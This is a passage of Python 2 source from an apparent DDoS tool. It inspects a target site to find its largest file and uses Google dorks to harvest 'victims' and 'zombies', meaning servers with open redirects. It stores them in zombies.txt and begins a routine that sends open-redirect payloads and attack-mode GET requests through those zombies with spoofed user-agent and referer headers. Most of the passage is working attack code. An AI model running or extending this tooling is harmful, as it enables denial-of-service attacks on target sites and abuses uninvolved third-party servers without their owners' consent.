  749.                 mpegs[mpeg] = int(size)
  750.                 print('(Size: ' + str(size) + ' Bytes)')
  751.                 print '-'*12
  752.             #print mpegs
  753.             biggest_mpeg = max(mpegs.keys(), key=lambda x: mpegs[x]) # search/extract biggest video (.mpeg) value from dict
  754.             biggest_files[biggest_mpeg] = mpegs[biggest_mpeg] # add biggest video (.mpeg) to list
  755.         except: # if not any .mpeg found, go for next
  756.             pass
  757.         try: # search for .mp3 files
  758.             regex_mp3 = []
  759.             regex_mp31 = "<src='(.+?.mp3)'" # search on target's results using regex with simple quotation
  760.             regex_mp3.append(regex_mp31)
  761.             regex_mp32 = '<src="(.+?.mp3)"' # search on target's results using regex with double quotation
  762.             regex_mp3.append(regex_mp32)
  763.             #regex_mp33 = '<src=(.+?.mp3)' # search on target's results using regex without quotations
  764.             #regex_mp3.append(regex_mp33)
  765.             for regmp3 in regex_mp3:
  766.                 pattern_mp3 = re.compile(regmp3)
  767.                 mp3_links = re.findall(pattern_mp3, target_reply)
  768.             mp3s = {}
  769.             for mp3 in mp3_links:
  770.                 print('+Audio (.mp3) found: ' + mp3)
  771.                 try:
  772.                     if mp3.startswith('http'):
  773.                         mp3_file = urllib.urlopen(mp3)
  774.                     else:
  775.                         target_host = urlparse(options.inspect)
  776.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  777.                         if not target_url.endswith('/'): # add "/" to end of target
  778.                             target_url = target_url + "/"
  779.                         mp3_file = urllib.urlopen(target_url + mp3)
  780.                     size = mp3_file.headers.get("content-length")
  781.                     if size is None: # grab data with len if content-lenght is not available on headers
  782.                         size = len(mp3_file.read())
  783.                 except:
  784.                     print('[Error] - Unable to retrieve info from Audio)')
  785.                     size = 0
  786.                 mp3s[mp3] = int(size)
  787.                 print('(Size: ' + str(size) + ' Bytes)')
  788.                 print '-'*12
  789.             #print mp3s
  790.             biggest_mp3 = max(mp3s.keys(), key=lambda x: mp3s[x]) # search/extract biggest audio (.mp3) value from dict
  791.             biggest_files[biggest_mp3] = mp3s[biggest_mp3] # add biggest audio (.mp3) to list
  792.         except: # if not any .mp3 found, go for next
  793.             pass
  794.         try: # search for .mp4 files
  795.             regex_mp4 = []
  796.             regex_mp41 = "<src='(.+?.mp4)'" # search on target's results using regex with simple quotation
  797.             regex_mp4.append(regex_mp41)
  798.             regex_mp42 = '<src="(.+?.mp4)"' # search on target's results using regex with double quotation
  799.             regex_mp4.append(regex_mp42)
  800.             #regex_mp43 = '<src=(.+?.mp4)' # search on target's results using regex without quotations
  801.             #regex_mp4.append(regex_mp43)
  802.             for regmp4 in regex_mp4:
  803.                 pattern_mp4 = re.compile(regmp4)
  804.                 mp4_links = re.findall(pattern_mp4, target_reply)
  805.             mp4s = {}
  806.             for mp4 in mp4_links:
  807.                 print('+Video (.mp4) found: ' + mp4)
  808.                 try:
  809.                     if mp4.startswith('http'):
  810.                         mp4_file = urllib.urlopen(mp4)
  811.                     else:
  812.                         target_host = urlparse(options.inspect)
  813.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  814.                         if not target_url.endswith('/'): # add "/" to end of target
  815.                             target_url = target_url + "/"
  816.                         mp4_file = urllib.urlopen(target_url + mp4)
  817.                     size = mp4_file.headers.get("content-length")
  818.                     if size is None: # grab data with len if content-lenght is not available on headers
  819.                         size = len(mp4_file.read())
  820.                 except:
  821.                     print('[Error] - Unable to retrieve info from Video)')
  822.                     size = 0
  823.                 mp4s[mp4] = int(size)
  824.                 print('(Size: ' + str(size) + ' Bytes)')
  825.                 print '-'*12
  826.             #print mp4s
  827.             biggest_mp4 = max(mp4s.keys(), key=lambda x: mp4s[x]) # search/extract biggest video (.mp4) value from dict
  828.             biggest_files[biggest_mp4] = mp4s[biggest_mp4] # add biggest video (.mp4) to list
  829.         except: # if not any .mp4 found, go for next
  830.             pass
  831.         try: # search for .ogg files
  832.             regex_ogg = []
  833.             regex_ogg1 = "<src='(.+?.ogg)'" # search on target's results using regex with simple quotation
  834.             regex_ogg.append(regex_ogg1)
  835.             regex_ogg2 = '<src="(.+?.ogg)"' # search on target's results using regex with double quotation
  836.             regex_ogg.append(regex_ogg2)
  837.             #regex_ogg3 = '<src=(.+?.ogg)' # search on target's results using regex without quotations
  838.             #regex_ogg.append(regex_ogg3)
  839.             for regogg in regex_ogg:
  840.                 pattern_ogg = re.compile(regogg)
  841.                 ogg_links = re.findall(pattern_ogg, target_reply)
  842.             oggs = {}
  843.             for ogg in ogg_links:
  844.                 print('+Video (.ogg) found: ' + ogg)
  845.                 try:
  846.                     if ogg.startswith('http'):
  847.                         ogg_file = urllib.urlopen(ogg)
  848.                     else:
  849.                         target_host = urlparse(options.inspect)
  850.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  851.                         if not target_url.endswith('/'): # add "/" to end of target
  852.                             target_url = target_url + "/"
  853.                         ogg_file = urllib.urlopen(target_url + ogg)
  854.                     size = ogg_file.headers.get("content-length")
  855.                     if size is None: # grab data with len if content-lenght is not available on headers
  856.                         size = len(ogg_file.read())
  857.                 except:
  858.                     print('[Error] - Unable to retrieve info from Video)')
  859.                     size = 0
  860.                 oggs[ogg] = int(size)
  861.                 print('(Size: ' + str(size) + ' Bytes)')
  862.                 print '-'*12
  863.             #print oggs
  864.             biggest_ogg = max(oggs.keys(), key=lambda x: oggs[x]) # search/extract biggest video (.ogg) value from dict
  865.             biggest_files[biggest_ogg] = oggs[biggest_ogg] # add biggest video (.ogg) to list
  866.         except: # if not any .ogg found, go for next
  867.             pass
  868.         try: # search for .ogv files
  869.             regex_ogv = []
  870.             regex_ogv1 = "<src='(.+?.ogv)'" # search on target's results using regex with simple quotation
  871.             regex_ogv.append(regex_ogv1)
  872.             regex_ogv2 = '<src="(.+?.ogv)"' # search on target's results using regex with double quotation
  873.             regex_ogv.append(regex_ogv2)
  874.             #regex_ogv3 = '<src=(.+?.ogv)' # search on target's results using regex without quotations
  875.             #regex_ogv.append(regex_ogv3)
  876.             for regogv in regex_ogv:
  877.                 pattern_ogv = re.compile(regogv)
  878.                 ogv_links = re.findall(pattern_ogv, target_reply)
  879.             ogvs = {}
  880.             for ogv in ogv_links:
  881.                 print('+Video (.ogv) found: ' + ogv)
  882.                 try:
  883.                     if ogv.startswith('http'):
  884.                         ogv_file = urllib.urlopen(ogv)
  885.                     else:
  886.                         target_host = urlparse(options.inspect)
  887.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  888.                         if not target_url.endswith('/'): # add "/" to end of target
  889.                             target_url = target_url + "/"
  890.                         ogv_file = urllib.urlopen(target_url + ogv)
  891.                     size = ogv_file.headers.get("content-length")
  892.                     if size is None: # grab data with len if content-lenght is not available on headers
  893.                         size = len(ogv_file.read())
  894.                 except:
  895.                     print('[Error] - Unable to retrieve info from Video)')
  896.                     size = 0
  897.                 ogvs[ogv] = int(size)
  898.                 print('(Size: ' + str(size) + ' Bytes)')
  899.                 print '-'*12
  900.             #print ogvs
  901.             biggest_ogv = max(ogvs.keys(), key=lambda x: ogvs[x]) # search/extract biggest video (.ogv) value from dict
  902.             biggest_files[biggest_ogv] = ogvs[biggest_ogv] # add biggest video (.ogv) to list
  903.         except: # if not any .ogv found, go for next
  904.             pass
  905.         try: # search for .wmv files
  906.             regex_wmv = []
  907.             regex_wmv1 = "<src='(.+?.wmv)'" # search on target's results using regex with simple quotation
  908.             regex_wmv.append(regex_wmv1)
  909.             regex_wmv2 = '<src="(.+?.wmv)"' # search on target's results using regex with double quotation
  910.             regex_wmv.append(regex_wmv2)
  911.             #regex_wmv3 = '<src=(.+?.wmv)' # search on target's results using regex without quotations
  912.             #regex_wmv.append(regex_wmv3)
  913.             for regwmv in regex_wmv:
  914.                 pattern_wmv = re.compile(regwmv)
  915.                 wmv_links = re.findall(pattern_wmv, target_reply)
  916.             wmvs = {}
  917.             for wmv in wmv_links:
  918.                 print('+Video (.wmv) found: ' + wmv)
  919.                 try:
  920.                     if wmv.startswith('http'):
  921.                         wmv_file = urllib.urlopen(wmv)
  922.                     else:
  923.                         target_host = urlparse(options.inspect)
  924.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  925.                         if not target_url.endswith('/'): # add "/" to end of target
  926.                             target_url = target_url + "/"
  927.                         wmv_file = urllib.urlopen(target_url + wmv)
  928.                     size = wmv_file.headers.get("content-length")
  929.                     if size is None: # grab data with len if content-lenght is not available on headers
  930.                         size = len(wmv_file.read())
  931.                 except:
  932.                     print('[Error] - Unable to retrieve info from Video)')
  933.                     size = 0
  934.                 wmvs[wmv] = int(size)
  935.                 print('(Size: ' + str(size) + ' Bytes)')
  936.                 print '-'*12
  937.             #print wmvs
  938.             biggest_wmv = max(wmvs.keys(), key=lambda x: wmvs[x]) # search/extract biggest video (.wmv) value from dict
  939.             biggest_files[biggest_wmv] = wmvs[biggest_wmv] # add biggest video (.wmv) to list
  940.         except: # if not any .wmv found, go for next
  941.             pass
  942.         try: # search for .css files
  943.             regex_css = []
  944.             regex_css1 = "href='(.+?.css[^']*)'" # search on target's results using regex with simple quotation
  945.             regex_css.append(regex_css1)
  946.             regex_css2 = 'href="(.+?.css[^"]*)"' # search on target's results using regex with double quotation
  947.             regex_css.append(regex_css2)
  948.             #regex_css3 = "href=(.+?.css[^']*)" # search on target's results using regex without quotations
  949.             #regex_css.append(regex_css3)
  950.             for regcss in regex_css:
  951.                 pattern_css = re.compile(regcss)
  952.                 css_links = re.findall(pattern_css, target_reply)
  953.             csss = {}
  954.             for css in css_links:
  955.                 print('+Style (.css) found: ' + css)
  956.                 try:
  957.                     if css.startswith('http'):
  958.                         css_file = urllib.urlopen(css)
  959.                     else:
  960.                         target_host = urlparse(options.inspect)
  961.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  962.                         if not target_url.endswith('/'): # add "/" to end of target
  963.                             target_url = target_url + "/"
  964.                         css_file = urllib.urlopen(target_url + css)
  965.                     size = css_file.headers.get("content-length")
  966.                     if size is None: # grab data with len if content-lenght is not available on headers
  967.                         size = len(css_file.read())
  968.                 except:
  969.                     print('[Error] - Unable to retrieve info from Style)')
  970.                     size = 0
  971.                 csss[css] = int(size)
  972.                 print('(Size: ' + str(size) + ' Bytes)')
  973.                 print '-'*12
  974.             #print csss
  975.             biggest_css = max(csss.keys(), key=lambda x: csss[x]) # search/extract biggest style (.css) value from dict
  976.             biggest_files[biggest_css] = csss[biggest_css] # add biggest style (.css) to list
  977.         except: # if not any .css found, go for next
  978.             pass
  979.         try: # search for .js files
  980.             regex_js = []
  981.             regex_js1 = "src='(.+?.js[^']*)'" # search on target's results using regex with simple quotation
  982.             regex_js.append(regex_js1)
  983.             regex_js2 = 'src="(.+?.js[^"]*)"' # search on target's results using regex with double quotation
  984.             regex_js.append(regex_js2)
  985.             #regex_js3 = "src=(.+?.js[^']*)" # search on target's results using regex without quotations
  986.             #regex_js.append(regex_js3)
  987.             for regjs in regex_js:
  988.                 pattern_js = re.compile(regjs)
  989.                 js_links = re.findall(pattern_js, target_reply)
  990.             jss = {}
  991.             for js in js_links:
  992.                 print('+Script (.js) found: ' + js)
  993.                 try:
  994.                     if js.startswith('http'):
  995.                         js_file = urllib.urlopen(js)
  996.                     else:
  997.                         target_host = urlparse(options.inspect)
  998.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  999.                         if not target_url.endswith('/'): # add "/" to end of target
  1000.                             target_url = target_url + "/"
  1001.                         js_file = urllib.urlopen(target_url + js)
  1002.                     size = js_file.headers.get("content-length")
  1003.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1004.                         size = len(js_file.read())
  1005.                 except:
  1006.                     print('[Error] - Unable to retrieve info from Script')
  1007.                     size = 0
  1008.                 jss[js] = int(size)
  1009.                 print('(Size: ' + str(size) + ' Bytes)')
  1010.                 print '-'*12
  1011.             #print jss
  1012.             biggest_js = max(jss.keys(), key=lambda x: jss[x]) # search/extract biggest script (.js) value from dict
  1013.             biggest_files[biggest_js] = jss[biggest_js] # add biggest script (.js) to list
  1014.         except: # if not any .js found, go for next
  1015.             pass
  1016.         try: # search for .xml files
  1017.             regex_xml = []
  1018.             regex_xml1 = "href='(.+?.xml)'" # search on target's results using regex with simple quotation
  1019.             regex_xml.append(regex_xml1)
  1020.             regex_xml2 = 'href="(.+?.xml)"' # search on target's results using regex with double quotation
  1021.             regex_xml.append(regex_xml2)
  1022.             #regex_xml3 = 'href=(.+?.xml)' # search on target's results using regex without quotations
  1023.             #regex_xml.append(regex_xml3)
  1024.             xml_links = []
  1025.             for regxml in regex_xml: # accumulate matches from both quotation styles
  1026.                 xml_links += re.findall(re.compile(regxml), target_reply)
  1027.             xmls = {}
  1028.             for xml in xml_links:
  1029.                 print('+Script (.xml) found: ' + xml)
  1030.                 try:
  1031.                     if xml.startswith('http'):
  1032.                         xml_file = urllib.urlopen(xml)
  1033.                     else:
  1034.                         target_host = urlparse(options.inspect)
  1035.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1036.                         if not target_url.endswith('/'): # add "/" to end of target
  1037.                             target_url = target_url + "/"
  1038.                         xml_file = urllib.urlopen(target_url + xml)
  1039.                     size = xml_file.headers.get("content-length")
  1040.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1041.                         size = len(xml_file.read())
  1042.                 except:
  1043.                     print('[Error] - Unable to retrieve info from Script')
  1044.                     size = 0
  1045.                 xmls[xml] = int(size)
  1046.                 print('(Size: ' + str(size) + ' Bytes)')
  1047.                 print '-'*12
  1048.             #print xmls
  1049.             biggest_xml = max(xmls.keys(), key=lambda x: xmls[x]) # search/extract biggest script (.xml) value from dict
  1050.             biggest_files[biggest_xml] = xmls[biggest_xml]  # add biggest script (.xml) to list
  1051.         except: # if not any .xml found, go for next
  1052.             pass
  1053.         try: # search for .php files
  1054.             regex_php = []
  1055.             regex_php1 = "href='(.+?.php)'" # search on target's results using regex with simple quotation
  1056.             regex_php.append(regex_php1)
  1057.             regex_php2 = 'href="(.+?.php)"' # search on target's results using regex with double quotation
  1058.             regex_php.append(regex_php2)
  1059.             #regex_php3 = 'href=(.+?.php)' # search on target's results using regex without quotations
  1060.             #regex_php.append(regex_php3)
  1061.             php_links = []
  1062.             for regphp in regex_php: # accumulate matches from both quotation styles
  1063.                 php_links += re.findall(re.compile(regphp), target_reply)
  1064.             phps = {}
  1065.             for php in php_links:
  1066.                 print('+Webpage (.php) found: ' + php)
  1067.                 try:
  1068.                     if php.startswith('http'):
  1069.                         php_file = urllib.urlopen(php)
  1070.                     else:
  1071.                         target_host = urlparse(options.inspect)
  1072.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1073.                         if not target_url.endswith('/'): # add "/" to end of target
  1074.                             target_url = target_url + "/"
  1075.                         php_file = urllib.urlopen(target_url + php)
  1076.                     size = php_file.headers.get("content-length")
  1077.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1078.                         size = len(php_file.read())
  1079.                 except:
  1080.                     print('[Error] - Unable to retrieve info from Webpage')
  1081.                     size = 0
  1082.                 phps[php] = int(size)
  1083.                 print('(Size: ' + str(size) + ' Bytes)')
  1084.                 print '-'*12
  1085.             #print phps
  1086.             biggest_php = max(phps.keys(), key=lambda x: phps[x]) # search/extract biggest file (.php) value from dict
  1087.             biggest_files[biggest_php] = phps[biggest_php] # add biggest file (.php) to list
  1088.         except: # if not any .php found, go for next
  1089.             pass
  1090.         try: # search for .html files
  1091.             regex_html = []
  1092.             regex_html1 = "href='(.+?.html)'" # search on target's results using regex with simple quotation
  1093.             regex_html.append(regex_html1)
  1094.             regex_html2 = 'href="(.+?.html)"' # search on target's results using regex with double quotation
  1095.             regex_html.append(regex_html2)
  1096.             #regex_html3 = 'href=(.+?.html)' # search on target's results using regex without quotations
  1097.             #regex_html.append(regex_html3)
  1098.             html_links = []
  1099.             for reghtml in regex_html: # accumulate matches from both quotation styles
  1100.                 html_links += re.findall(re.compile(reghtml), target_reply)
  1101.             htmls = {}
  1102.             for html in html_links:
  1103.                 print('+Webpage (.html) found: ' + html)
  1104.                 try:
  1105.                     if html.startswith('http'):
  1106.                         html_file = urllib.urlopen(html)
  1107.                     else:
  1108.                         target_host = urlparse(options.inspect)
  1109.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1110.                         if not target_url.endswith('/'): # add "/" to end of target
  1111.                             target_url = target_url + "/"
  1112.                         html_file = urllib.urlopen(target_url + html)
  1113.                     size = html_file.headers.get("content-length")
  1114.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1115.                         size = len(html_file.read())
  1116.                 except:
  1117.                     print('[Error] - Unable to retrieve info from Webpage')
  1118.                     size = 0
  1119.                 htmls[html] = int(size)
  1120.                 print('(Size: ' + str(size) + ' Bytes)')
  1121.                 print '-'*12
  1122.             #print htmls
  1123.             biggest_html = max(htmls.keys(), key=lambda x: htmls[x]) # search/extract biggest file (.html) value from dict
  1124.             biggest_files[biggest_html] = htmls[biggest_html] # add biggest file (.html) to list
  1125.         except: # if not any .html found, go for next
  1126.             pass
  1127.         try: # search for .jsp files
  1128.             regex_jsp = []
  1129.             regex_jsp1 = "href='(.+?.jsp)'" # search on target's results using regex with simple quotation
  1130.             regex_jsp.append(regex_jsp1)
  1131.             regex_jsp2 = 'href="(.+?.jsp)"' # search on target's results using regex with double quotation
  1132.             regex_jsp.append(regex_jsp2)
  1133.             #regex_jsp3 = 'href=(.+?.jsp)' # search on target's results using regex without quotations
  1134.             #regex_jsp.append(regex_jsp3)
  1135.             jsp_links = []
  1136.             for regjsp in regex_jsp: # accumulate matches from both quotation styles
  1137.                 jsp_links += re.findall(re.compile(regjsp), target_reply)
  1138.             jsps = {}
  1139.             for jsp in jsp_links:
  1140.                 print('+Webpage (.jsp) found: ' + jsp)
  1141.                 try:
  1142.                     if jsp.startswith('http'):
  1143.                         jsp_file = urllib.urlopen(jsp)
  1144.                     else:
  1145.                         target_host = urlparse(options.inspect)
  1146.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1147.                         if not target_url.endswith('/'): # add "/" to end of target
  1148.                             target_url = target_url + "/"
  1149.                         jsp_file = urllib.urlopen(target_url + jsp)
  1150.                     size = jsp_file.headers.get("content-length")
  1151.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1152.                         size = len(jsp_file.read())
  1153.                 except:
  1154.                     print('[Error] - Unable to retrieve info from Webpage')
  1155.                     size = 0
  1156.                 jsps[jsp] = int(size)
  1157.                 print('(Size: ' + str(size) + ' Bytes)')
  1158.                 print '-'*12
  1159.             #print jsps
  1160.             biggest_jsp = max(jsps.keys(), key=lambda x: jsps[x]) # search/extract biggest file (.jsp) value from dict
  1161.             biggest_files[biggest_jsp] = jsps[biggest_jsp] # add biggest file (.jsp) to list
  1162.         except: # if not any .jsp found, go for next
  1163.             pass
  1164.         try: # search for .asp files
  1165.             regex_asp = []
  1166.             regex_asp1 = "href='(.+?.asp)'" # search on target's results using regex with simple quotation
  1167.             regex_asp.append(regex_asp1)
  1168.             regex_asp2 = 'href="(.+?.asp)"' # search on target's results using regex with double quotation
  1169.             regex_asp.append(regex_asp2)
  1170.             #regex_asp3 = 'href=(.+?.asp)' # search on target's results using regex without quotations
  1171.             #regex_asp.append(regex_asp3)
  1172.             asp_links = []
  1173.             for regasp in regex_asp: # accumulate matches from both quotation styles
  1174.                 asp_links += re.findall(re.compile(regasp), target_reply)
  1175.             asps = {}
  1176.             for asp in asp_links:
  1177.                 print('+Webpage (.asp) found: ' + asp)
  1178.                 try:
  1179.                     if asp.startswith('http'):
  1180.                         asp_file = urllib.urlopen(asp)
  1181.                     else:
  1182.                         target_host = urlparse(options.inspect)
  1183.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1184.                         if not target_url.endswith('/'): # add "/" to end of target
  1185.                             target_url = target_url + "/"
  1186.                         asp_file = urllib.urlopen(target_url + asp)
  1187.                     size = asp_file.headers.get("content-length")
  1188.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1189.                         size = len(asp_file.read())
  1190.                 except:
  1191.                     print('[Error] - Unable to retrieve info from Webpage')
  1192.                     size = 0
  1193.                 asps[asp] = int(size)
  1194.                 print('(Size: ' + str(size) + ' Bytes)')
  1195.                 print '-'*12
  1196.             #print asps
  1197.             biggest_asp = max(asps.keys(), key=lambda x: asps[x]) # search/extract biggest file (.asp) value from dict
  1198.             biggest_files[biggest_asp] = asps[biggest_asp] # add biggest file (.asp) to list
  1199.         except: # if not any .asp found, go for next
  1200.             pass
  1201.         try: # search for .txt files
  1202.             regex_txt = []
  1203.             regex_txt1 = "href='(.+?.txt)'" # search on target's results using regex with simple quotation
  1204.             regex_txt.append(regex_txt1)
  1205.             regex_txt2 = 'href="(.+?.txt)"' # search on target's results using regex with double quotation
  1206.             regex_txt.append(regex_txt2)
  1207.             #regex_txt3 = 'href=(.+?.txt)' # search on target's results using regex without quotations
  1208.             #regex_txt.append(regex_txt3)
  1209.             txt_links = []
  1210.             for regtxt in regex_txt: # accumulate matches from both quotation styles
  1211.                 txt_links += re.findall(re.compile(regtxt), target_reply)
  1212.             txts = {}
  1213.             for txt in txt_links:
  1214.                 print('+File (.txt) found: ' + txt)
  1215.                 try:
  1216.                     if txt.startswith('http'):
  1217.                         txt_file = urllib.urlopen(txt)
  1218.                     else:
  1219.                         target_host = urlparse(options.inspect)
  1220.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1221.                         if not target_url.endswith('/'): # add "/" to end of target
  1222.                             target_url = target_url + "/"
  1223.                         txt_file = urllib.urlopen(target_url + txt)
  1224.                     size = txt_file.headers.get("content-length")
  1225.                     if size is None: # grab size with len() if Content-Length is not available in headers
  1226.                         size = len(txt_file.read())
  1227.                 except:
  1228.                     print('[Error] - Unable to retrieve info from File')
  1229.                     size = 0
  1230.                 txts[txt] = int(size)
  1231.                 print('(Size: ' + str(size) + ' Bytes)')
  1232.                 print '-'*12
  1233.             #print txts
  1234.             biggest_txt = max(txts.keys(), key=lambda x: txts[x]) # search/extract biggest file (.txt) value from dict
  1235.             biggest_files[biggest_txt] = txts[biggest_txt] # add biggest file (.txt) to list
  1236.         except: # if not any .txt found, go for next
  1237.             pass
  1238.         print '='*80
  1239.         #print biggest_files
  1240.         biggest_file_on_target = max(biggest_files.keys(), key=lambda x: biggest_files[x]) # search/extract biggest file value from dict
  1241.         if biggest_file_on_target.startswith('http'):
  1242.             print ('=Biggest File: ' + biggest_file_on_target)
  1243.         else:
  1244.             target_host = urlparse(options.inspect)
  1245.             target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1246.             if not target_url.endswith('/'): # add "/" to end of target
  1247.                 target_url = target_url + "/"
  1248.             print ('=Biggest File: ' + target_url + biggest_file_on_target)
  1249.         print '='*80 + '\n'
  1250.  
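    # extract_dorks() below expects a plain-text 'dorks.txt' in the working directory,
    # one search pattern per line (no quotes); blank lines are not filtered out, so an
    # empty line becomes an empty dork. Purely illustrative example of the file contents:
    #   proxy.php?url=
    #   redirect?to=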
  1251.     def extract_dorks(self):
  1252.         # extract dorks from file (ex: 'dorks.txt')
  1253.         try:
  1254.             f = open('dorks.txt')
  1255.             dorks = f.readlines()
  1256.             dorks = [ dork.replace('\n','') for dork in dorks ]
  1257.             f.close()
  1258.             if not dorks:
  1259.                 print "\n[Error] - Impossible to retrieve 'dorks' from file."
  1260.                 return #sys.exit(2)
  1261.             else:
  1262.                 return dorks
  1263.         except:
  1264.             if os.path.exists('dorks.txt') == True:
  1265.                 print '\n[Error] - Cannot open:', 'dorks.txt', "\n"
  1266.                 return #sys.exit(2)
  1267.             else:
  1268.                 print '\n[Error] - Cannot find:', 'dorks.txt', "\n"
  1269.                 return #sys.exit(2)
  1270.  
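    # search_zombies() builds a Google query such as (shape shown for illustration only;
    # the exact encoding comes from urllib.urlencode below):
    #   https://www.google.com/xhtml?q=inurl%3A%22<dork>%22&start=0&num=10&gws_rd=ssl
    # and scrapes the result links with a regex on the returned HTML, so it will silently
    # return nothing if Google changes its result markup or serves a captcha instead.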
  1271.     def search_zombies(self, dork):
  1272.         # crawl google's results to search for possible zombies
  1273.         options = self.options
  1274.         url = 'https://www.google.com/xhtml?'
  1275.         if options.search: # search from query
  1276.             q = 'inurl:"' + str(options.search) + '"' # set query to search literally in google's results
  1277.         if options.dorks: # search from a dork
  1278.             q = 'inurl:"' + str(dork) + '"' # set query, from a dork, to search literally in google's results
  1279.         start = 0 # set index number of first entry
  1280.         if options.num_results: # set number of results to search
  1281.             try:
  1282.                 num = int(options.num_results)
  1283.             except:
  1284.                 print("You should specify an integer! Using default value: 10\n")
  1285.                 num = 10
  1286.         else:
  1287.             num = 10
  1288.         gws_rd = 'ssl' # set SSL as default
  1289.         query_string = { 'q':q, 'start':start, 'num':num, 'gws_rd':gws_rd }
  1290.         data = urllib.urlencode(query_string)
  1291.         url = url + data
  1292.         headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  1293.         if options.verbose:
  1294.             print("Query used: " + url + "\n")
  1295.         try:
  1296.             req = urllib2.Request(url, None, headers)
  1297.             google_reply = urllib2.urlopen(req).read()
  1298.         except:
  1299.             print('[Error] - Unable to connect to google\n')
  1300.             if not options.dorks:
  1301.                 return #sys.exit(2)
  1302.             else:
  1303.                 google_reply = ''
  1304.         #print google_reply
  1305.         regex = '<h3 class="r"><a href="/url(.+?)">' # search urls on google's results using regex
  1306.         pattern = re.compile(regex)
  1307.         url_links = re.findall(pattern, google_reply)
  1308.         zombies = []
  1309.         for url in url_links:
  1310.             url_link = url.strip('?q=') # parse url_links to retrieve only a url
  1311.             url_link = urllib.unquote(url_link).decode('utf8') # unquote encoding
  1312.             if options.search:
  1313.                 sep = str(options.search)
  1314.             if options.dorks:
  1315.                 sep = str(dork)
  1316.             url_link = url_link.rsplit(sep, 1)[0] + sep
  1317.             if url_link not in zombies: # parse possible repetitions
  1318.                 print('+Victim found: ' + url_link)
  1319.                 print '-'*12
  1320.                 zombies.append(url_link)
  1321.             else:
  1322.                 pass
  1323.         if len(zombies) == 0:
  1324.             print "[INFO] - No possible victims found!"
  1325.             if not options.dorks:
  1326.                 print "\n"
  1327.                 return #sys.exit(2)
  1328.         print '\n' + '='*22
  1329.         print('+Possible Zombies: ' + str(len(zombies)))
  1330.         self.total_possible_zombies = self.total_possible_zombies + len(zombies)
  1331.         print '='*22 + '\n'
  1332.         if options.dorks:
  1333.             print '-'*44 + '\n'
  1334.         return zombies
  1335.  
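    # extract_zombies() reads the zombie list from 'zombies.txt' (or from the file given
    # with the test option), one Open Redirect vector per line; each entry is expected to
    # be a URL that the target can simply be appended to, e.g. (illustrative only)
    # 'http://zombie.example/redirect.php?u='.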
  1336.     def extract_zombies(self):
  1337.         # extract targets from file (ex: 'zombies.txt')
  1338.         options = self.options
  1339.         if self.options.test:
  1340.             try:
  1341.                 f = open(options.test)
  1342.                 zombies = f.readlines()
  1343.                 zombies = [ zombie.replace('\n','') for zombie in zombies ]
  1344.                 f.close()
  1345.                 if not zombies:
  1346.                     print "\n[Error] - Impossible to retrieve 'zombies' from file."
  1347.                     return #sys.exit(2)
  1348.                 else:
  1349.                     return zombies
  1350.             except:
  1351.                 if os.path.exists(options.test) == True:
  1352.                     print '\n[Error] - Cannot open:', options.test, "\n"
  1353.                     return #sys.exit(2)
  1354.                 else:
  1355.                     print '\n[Error] - Cannot find:', options.test, "\n"
  1356.                     return #sys.exit(2)
  1357.         else:
  1358.             try:
  1359.                 f = open('zombies.txt')
  1360.                 zombies = f.readlines()
  1361.                 zombies = [ zombie.replace('\n','') for zombie in zombies ]
  1362.                 f.close()
  1363.                 if not zombies:
  1364.                     print "\n[Error] - Impossible to retrieve 'zombies' from file."
  1365.                     return #sys.exit(2)
  1366.                 else:
  1367.                     return zombies
  1368.             except:
  1369.                 if os.path.exists('zombies.txt') == True:
  1370.                     print '\n[Error] - Cannot open:', 'zombies.txt', "\n"
  1371.                     return #sys.exit(2)
  1372.                 else:
  1373.                     print '\n[Error] - Cannot find:', 'zombies.txt', "\n"
  1374.                     return #sys.exit(2)
  1375.  
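    # update_zombies() rewrites the test file with only the zombies that passed the
    # checks and, when zombies came from a search/dork/download run, appends any new
    # entries to 'zombies.txt' while skipping ones already present.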
  1376.     def update_zombies(self, zombies_ready):
  1377.         # update targets on file (ex: 'zombies.txt')
  1378.         options = self.options
  1379.         if options.test:
  1380.             f = open(options.test, "w") # re-write list only with valid zombies
  1381.             for zombie in zombies_ready:
  1382.                 f.write(zombie + os.linesep)
  1383.             f.close()
  1384.         if options.search or options.dorks or options.download:
  1385.             f = open('zombies.txt')
  1386.             zombies_on_file = f.read().splitlines()
  1387.             f.close()
  1388.             with open("zombies.txt", "a") as zombie_list: # append them to existing list
  1389.                 for zombie in zombies_ready:
  1390.                     if zombie not in zombies_on_file: # parse possible repetitions
  1391.                         zombie_list.write(zombie + os.linesep)
  1392.  
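    # connect_zombies() is reused for four request types, selected by boolean flags set by
    # the caller before each call: self.head (HEAD liveness check), self.payload (Open
    # Redirect probe), self.external (third-party 'is it down' check) and self.attack_mode
    # (GET against the target through the zombie). Only one flag should be True per call,
    # and the caller resets it afterwards.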
  1393.     def connect_zombies(self, zombie):
  1394.         # connect zombies and manage different options: HEAD, GET, POST,
  1395.         # user-Agent, referer, timeout, retries, threads, delay..
  1396.         options = self.options
  1397.         c = pycurl.Curl()
  1398.         if self.head == True:
  1399.             c.setopt(pycurl.URL, zombie) # set 'zombie' target
  1400.             c.setopt(pycurl.NOBODY, 1) # use HEAD
  1401.         if self.payload == True:
  1402.             payload = zombie + "http://www.google.es" #Open Redirect payload
  1403.             c.setopt(pycurl.URL, payload) # set 'zombie' payload
  1404.             c.setopt(pycurl.NOBODY, 0) # use GET
  1405.         if self.external == True:
